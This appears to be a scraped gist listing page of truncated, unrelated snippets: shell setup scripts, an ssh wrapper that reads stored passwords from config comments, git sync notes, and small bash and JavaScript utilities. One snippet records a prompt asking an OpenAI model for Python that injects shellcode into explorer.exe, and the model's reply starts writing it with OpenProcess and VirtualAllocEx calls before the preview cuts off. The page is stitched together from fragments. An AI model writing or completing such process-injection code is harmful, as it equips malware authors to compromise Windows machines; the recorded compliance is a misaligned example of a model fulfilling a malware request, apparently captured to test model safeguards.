<?php
$start = microtime(true);
$path = __DIR__ . '/pcntl_fork_send_email.php';
$emails = implode(',', ['[email protected]', '[email protected]']);
$command = 'php ' . $path . ' --emails=%s > /dev/null &';
// Execute the command
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env bash | |
set -e | |
echo "==> Установка zram-tools и необходимых утилит" | |
apt update | |
apt install -y zram-tools linux-tools-common linux-tools-generic systemd-zram-generator | |
echo "==> Настройка ZRAM через systemd-zram-generator" | |
cat <<EOF > /etc/systemd/zram-generator.conf |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env bash | |
#ORIG_SSH=/usr/bin/ssh | |
ORIG_SSH=/opt/homebrew/bin/ssh | |
HOST=$1 | |
SSHPASS=$(ggrep -Pzo "Host $HOST"'\s*\n((?!Host).*\n)*\s*#PS\s(\N+)\n' ~/.ssh/config|tail -n 2|head -n 1 | sed 's/ *#PS //') | |
if [ -n $SSHPASS ]; then | |
sleep 1 | |
else |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Go to Bitbucket and create a new repository (its better to have an empty repo) | |
git clone [email protected]:abc/myforkedrepo.git | |
cd myforkedrepo | |
Now add Github repo as a new remote in Bitbucket called "sync" | |
git remote add sync [email protected]:def/originalrepo.git | |
Verify what are the remotes currently being setup for "myforkedrepo". This following command should show "fetch" and "push" for two remotes i.e. "origin" and "sync" | |
git remote -v |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#OSX | |
lima encfs --standard /Users/alexnevpryaga/Library/Application\ Support/Mountain\ Duck/Volumes.noindex/Google\ Drive.localized/My\ Drive/vps/.raw/ /Users/alexnevpryaga/.sec | |
#https://help.ubuntu.ru/wiki/encfs_cloud | |
#https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet?tab=readme-ov-file#crypto-filesystem |
- install deps
python3 -m pip install openai
- call script
python3 ./openai_ask_bad.py
result:
Promt: Develop a python 3 function that injects shellcode (open calc) into the process \"explorer.exe\" and execute it from explorer memmory (script will be used on a machine runs Windows 11 OS). Include the relvant imports.No prelog.
ChatCompletion(id='chatcmpl-B6MDNN8i4zn5wnBmMseDHhPnElYTP', choices=[Choice(finish_reason='stop', index=0, logprobs=None, message=ChatCompletionMessage(content='```python\nimport ctypes\nimport struct\nimport psutil\n\ndef inject_shellcode(shellcode):\n # Find the process ID of explorer.exe\n for proc in psutil.process_iter():\n if proc.name() == \'explorer.exe\':\n pid = proc.pid\n break\n\n # Open explorer.exe process\n process = ctypes.windll.kernel32.OpenProcess(0x1F0FFF, False, pid)\n\n # Allocate memory in explorer.exe process for shellcode\n shellcode_addr = ctypes.windll.kernel32.VirtualAllocEx(process, 0, len(shellcode)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env bash | |
# get examples of using find command: | |
# $ rtfm find | |
function rtfm() { | |
old="$IFS" | |
IFS='+' | |
echo -n "Search manuals for: '$*'" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env bash | |
# echo 68656c6c6f20776f726c64|hex2string -> hello world | |
function hex2string(){ | |
i=${1:-$(</dev/stdin)}; | |
spaced=$(echo "$i"|fold -w2); | |
for i in ${spaced[@]}; do | |
echo -n -e "\x$i"; | |
done |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Utils | |
const parseUrl = (url, options) => { | |
const { origin, hash, search } = url | |
const pathname = url.pathname.replace(/\/index\.(x?html?|php|cgi|aspx)$/, "/") | |
return { | |
origin, | |
hash: options?.ignoreHash ? "" : hash, | |
search: options?.ignoreQuery ? "" : search, | |
pathname: options?.ignorePathname ? "" : pathname |
NewerOlder